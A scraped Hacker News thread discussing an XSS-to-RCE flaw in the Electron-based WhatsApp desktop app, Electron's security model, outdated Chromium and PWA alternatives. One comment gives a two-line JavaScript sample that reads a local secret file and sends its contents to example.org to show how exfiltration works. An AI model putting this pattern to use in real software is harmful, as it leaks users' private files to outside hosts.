> If you're going to use Electron, you HAVE to make sure it is updated with each update of Chromium.
I never really thought about this, but in retrospect, this is so blindingly obvious, and is almost certainly a potential exploit vector to a wide range of electron-based apps.
The big problem with Electron isn't that it forces you to keep up with Chrome, although that's important too, but rather that it links Node.js with content-controlled Javascript, so that DOM corruption vulnerabilities can be leveraged for RCE, even in the absence of a Chrome vulnerability. Most Electron RCEs that you've read about had nothing to do with Chromium.
There's a whole process for evaluating and auditing Electron applications, which is harder to do than auditing (for instance) a native mobile application or, probably, even a native desktop application.
It sure is. This is why Chrome apps and progressive web apps are great - they share the Chrome runtime and inherit its hardening, security properties and updates.
Many Electron apps should just be a PWA instead, and many actually are. Why would I want to install a desktop app for WhatsApp? It runs just fine in Chrome, and using More Tools -> Create shortcut..., you can even create a launcher entry that will launch the page in its own window.
Wonder if this exploit worked with the Mac App Store version of WhatsApp and the extra sandboxing layer(?) that whole ecosystem provides.
Out of sheer hope and ignorant superstition about the wonders of sandboxing, I tend to install the App Store versions of crap like WhatsApp and Slack whenever possible.
Preview is generated on sender side, preview is generated on client side or preview is generated on some server.
On a "secure" system as Whatsapp is advertised as, you'll notice only the second choice is "secure" and possible, since otherwise you'll disclose both your IP and lots of other things, like location (from IP).
It's easy to under appreciate the amount of infrastructure work involved in deploying a production electron app to customers. Auto-updates, code signing, installers etc...
I think it is a good idea to containerize all electron apps, and run them only in containers. It is because reducing the surface area of your code to the system will reduce vulnerabilities of your code.
Skype, Slack and WhatsApp are using 250MB each on my machine to do something that was already possible on my 64MB RAM machine 20 years ago. And on top of that they're running one of the easiest hackable runtimes ever. Sure it's fun to mess a bit with a website and remove nag screens here and there but for an application that is expected to have a trusted encryption system it's just ridiculous.
I hope the pendulum swings back again and we'll see companies start to use cross-platform Rust libraries in some kind of way. I can't imagine you can't reuse 80% of the code that powers those applications in any other way than using some kind of Javascript engine. And perhaps we can just compile it to web using webassembly?
I'm strongly opposed to apps that are just wrappers for web services. I don't need a wrapper when i could just open a browser i trust patches their vulnerabilities (nod to Firefox). Every electron app eats so much RAM, it's stupid. And in the end, I'm just using a browser making API calls, why do i need the wrapper?
The thing is that it’s just not a browser making API calls. The wrapper is so that you have access to lower level APIs, like access to the filesystem. This gives the Electron app more power than a browser.
I thought so as well - up until yesterday when I tried desktop version of Microsoft Outlook. Such an awful experience. Just trying to pick an available meeting room was surprisingly more difficult than on the modern web. And I can hardly see how even Microsoft could bring the web experience to desktop in the future without somehow leveraging the existing online version.
He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you just need to find a published one and use it through the persistent XSS found earlier and BAM: Remote Code Execution ACHIEVED!
> I did not take the time to actually exploit a public RCE
The XSS vulnerability is serious and looks fully deserving of a bug bounty. Likewise, using an old version of Electron is asking for trouble. But for me this PoC should include the extra step of "just" exploiting one of the RCE holes he's sure must exist.
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
If you can fetch arbitrary URLs, and the contents of local files, you can trivially exfiltrate the latter with the former. Just fetch the local file, then fetch an URL that encodes the contents of the local file.
var text = fetch("/local/secret/file");
fetch("https://example.org/"+encode(text));
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
Are you saying he could alert it but not exfiltrate it?
Just checked my discord client right now and it's using Chrome 69 through Electron 4.0.8. Haven't had a chance to check a desktop version of Slack yet.
I'm a heavy WhatsApp user and I feel like WhatsApp has gone downhill ever since Facebook took over. Performance is down significantly, I experience a lot more visible bugs, more and more exploits are being revealed about seemingly trivial components (file encryption, browser XSS), and useless features are beeing added. Its not like WhatsApp Inc. was flawless before they got acquired, but at least it worked well and most of the developers actually wanted to make a great chat app.
Its just a matter of time before Facebook merges WhatsApp with its Messenger (and keep either of those names).
heavy WhatsApp user here as well, and I have the total opposite experience, WhatsApp has greatly improved since then. End-to-end encryption, group chats and voice are all working really well right now.
Signal and Telegram are both solid alternatives built around different security models. When I get a notification in Messenger, Instagram, etc., I simply reply back with my contact info for those apps. Telegram gives you a vanity URL using your username, which is pretty cool.
Someone should create a nice little canary.js that reports on alert() etc being called by setting window.alert = function honeypotFunction(){…};. Although perhaps the noise from extensions and users would make the signal too useless outside of electron.
How come that WhatsApp has so many security flaws recently and Signal isn't affected? This cannot be coincidence right? Signal has less people working on it, no massive corporation behind the product, more people as smart as Moxie working on it. I don't believe these flaws are just bugs... Right?
Signal has a team of people behind it whose main focus is security and privacy. Of course everyone makes security mistakes, but I'd expect the Signal team to make fewer of them.
In this case, I would say the fewer people working on Signal is a strength, not a weakness.
[+] [-] oarsinsync|6 years ago|reply
I never really thought about this, but in retrospect, this is so blindingly obvious, and is almost certainly a potential exploit vector to a wide range of electron-based apps.
[+] [-] tptacek|6 years ago|reply
There's a whole process for evaluating and auditing Electron applications, which is harder to do than auditing (for instance) a native mobile application or, probably, even a native desktop application.
[+] [-] lima|6 years ago|reply
Many Electron apps should just be a PWA instead, and many actually are. Why would I want to install a desktop app for WhatsApp? It runs just fine in Chrome, and using More Tools -> Create shortcut..., you can even create a launcher entry that will launch the page in its own window.
[+] [-] apecat|6 years ago|reply
Out of sheer hope and ignorant superstition about the wonders of sandboxing, I tend to install the App Store versions of crap like WhatsApp and Slack whenever possible.
[+] [-] Sephr|6 years ago|reply
1. https://github.com/GoogleChromeLabs/carlo
[+] [-] emilfihlman|6 years ago|reply
Preview is generated on sender side, preview is generated on client side or preview is generated on some server.
On a "secure" system as Whatsapp is advertised as, you'll notice only the second choice is "secure" and possible, since otherwise you'll disclose both your IP and lots of other things, like location (from IP).
[+] [-] davej|6 years ago|reply
I'm working on a startup to help solve some of this: https://www.todesktop.com
Feedback appreciated :)
[+] [-] bhaavan|6 years ago|reply
[+] [-] dep_b|6 years ago|reply
I hope the pendulum swings back again and we'll see companies start to use cross-platform Rust libraries in some kind of way. I can't imagine you can't reuse 80% of the code that powers those applications in any other way than using some kind of Javascript engine. And perhaps we can just compile it to web using webassembly?
[+] [-] voicedYoda|6 years ago|reply
[+] [-] westoque|6 years ago|reply
[+] [-] vojta_letal|6 years ago|reply
[+] [-] dmurray|6 years ago|reply
> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you just need to find a published one and use it through the persistent XSS found earlier and BAM: Remote Code Execution ACHIEVED!
> I did not take the time to actually exploit a public RCE
The XSS vulnerability is serious and looks fully deserving of a bug bounty. Likewise, using an old version of Electron is asking for trouble. But for me this PoC should include the extra step of "just" exploiting one of the RCE holes he's sure must exist.
[+] [-] JoshTriplett|6 years ago|reply
If you can fetch arbitrary URLs, and the contents of local files, you can trivially exfiltrate the latter with the former. Just fetch the local file, then fetch an URL that encodes the contents of the local file.
[+] [-] nebulous1|6 years ago|reply
Are you saying he could alert it but not exfiltrate it?
[+] [-] fouc|6 years ago|reply
[+] [-] guessmyname|6 years ago|reply
(windows) You can also reverse the process used to package an app: https://www.electronjs.org/docs/tutorial/application-distrib...
[+] [-] RL_Quine|6 years ago|reply
[+] [-] kjaftaedi|6 years ago|reply
[+] [-] Deimorz|6 years ago|reply
You can still see it at both the top and bottom of this archived copy: https://web.archive.org/web/20200204164053/http://www.perime...
[+] [-] luckydata|6 years ago|reply
[+] [-] wiredfool|6 years ago|reply
[+] [-] projectdelphai|6 years ago|reply
[+] [-] Dinux|6 years ago|reply
Its just a matter of time before Facebook merges WhatsApp with its Messenger (and keep either of those names).
[+] [-] baby|6 years ago|reply
[+] [-] Stubb|6 years ago|reply
[+] [-] xenospn|6 years ago|reply
[+] [-] everlost|6 years ago|reply
[+] [-] h1fra|6 years ago|reply
[+] [-] pfundstein|6 years ago|reply
[+] [-] robocat|6 years ago|reply
[+] [-] dancemethis1|6 years ago|reply
[deleted]
[+] [-] vmchale|6 years ago|reply
[deleted]
[+] [-] Priem19|6 years ago|reply
[deleted]
[+] [-] imvetri|6 years ago|reply
[+] [-] kome|6 years ago|reply
[+] [-] mrnobody_67|6 years ago|reply
[+] [-] boring_twenties|6 years ago|reply
[+] [-] akerro|6 years ago|reply
[+] [-] bhaavan|6 years ago|reply
[+] [-] kelnos|6 years ago|reply
In this case, I would say the fewer people working on Signal is a strength, not a weakness.